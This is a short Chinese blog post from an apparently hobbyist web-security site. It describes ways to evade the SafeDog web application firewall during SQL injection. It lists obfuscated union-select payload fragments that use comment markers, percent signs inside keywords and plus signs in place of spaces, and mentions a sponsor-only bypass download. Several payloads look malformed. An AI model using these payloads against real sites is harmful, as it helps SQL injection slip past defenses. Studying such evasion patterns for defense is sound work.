关于特殊字符绕过安全狗 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



关于特殊字符绕过安全狗

2018-2-8 2:00 作者:阿城 | web安全 |

422df158e7c6c0bd.jpg


本人小菜垃圾得不得了的那种,不会过狗但是自己总结了一些过狗思路,安全狗等waf都是利用特征码来识别恶意代码,规则是死的代码是活的 绕狗所谓的绕狗。 

无非是使用一些特殊字符,符号来瞒天过海  

拿SQL注入比如:
/*/\*/union/*/\*/select/*/\*/1,2,3,4,5,6

/* */ 利用斜杠星号

un%io%n se%le%ct 利用百分号

'/*|%20--%20|*/'   

+号替换空格

等等一些思路


下面附几条思路:

 /*union/*/*2%0d%0wselect*/

/*union/*/*28%0xselect*/

/*union/*/*2%0e3select*/

 我也不知道讲什么,反正就是自己多尝试多想想一些思路,编码转换也行。


下面有个过狗小干货我就放到赞助本站系列吧


下载链接:点我下载





文章作者:阿城
文章地址:http://www.ac166.cn/post-193.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.